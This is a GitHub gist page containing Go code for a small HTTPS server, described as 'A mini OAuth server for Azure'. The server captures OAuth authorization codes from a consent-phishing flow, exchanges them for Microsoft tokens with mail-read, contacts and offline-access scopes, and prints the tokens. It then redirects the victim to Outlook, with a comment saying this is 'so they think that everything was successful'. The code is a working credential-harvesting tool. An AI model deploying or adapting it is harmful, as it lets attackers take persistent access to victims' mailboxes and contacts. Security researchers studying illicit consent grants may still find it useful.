Skip to content

Instantly share code, notes, and snippets.

@staaldraad
Last active March 2, 2024 16:56
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save staaldraad/d4f8b6ed20adbf21e45835bb046d14ca to your computer and use it in GitHub Desktop.
Save staaldraad/d4f8b6ed20adbf21e45835bb046d14ca to your computer and use it in GitHub Desktop.
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
func requestHandler(w http.ResponseWriter, req *http.Request) {
u, err := url.Parse(req.RequestURI)
if err != nil {
panic(err)
}
m, _ := url.ParseQuery(u.RawQuery)
fmt.Println(u.RawQuery)
getToken(m["code"][0])
target := "https://outlook.office365.com/"
//redirect the user so they think that everything was successful
http.Redirect(w, req, target, http.StatusTemporaryRedirect)
}
func getToken(code string) {
Transport := http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: false},
}
client := http.Client{Transport: &Transport}
client_id := "fceae27c-cac4-4bd3-947e-xxxxxxx" //change to your APP-id
scope := "offline_access%20people.read%20contacts.read.shared%20mail.read" //change to the permissions you need/want
redirect_uri := "https%3A%2F%2Fxxx.xxx.xxx.xxx%2Fpermission" //change to match the Redirect URI you set in your app at apps.dev.microsoft.com
postData := fmt.Sprintf("client_id=%s&scope=%s&code=%s&redirect_uri=%s&grant_type=authorization_code", client_id, scope, code, redirect_uri)
req, err := http.NewRequest("POST", "https://login.windows.net/common/oauth2/v2.0/token", strings.NewReader(postData))
if err != nil {
return
}
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return
}
fmt.Println(string(body))
}
func main() {
fmt.Println("starting")
http.HandleFunc("/", requestHandler)
http.ListenAndServeTLS(":443", "cert.pem", "key.pem", nil)
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment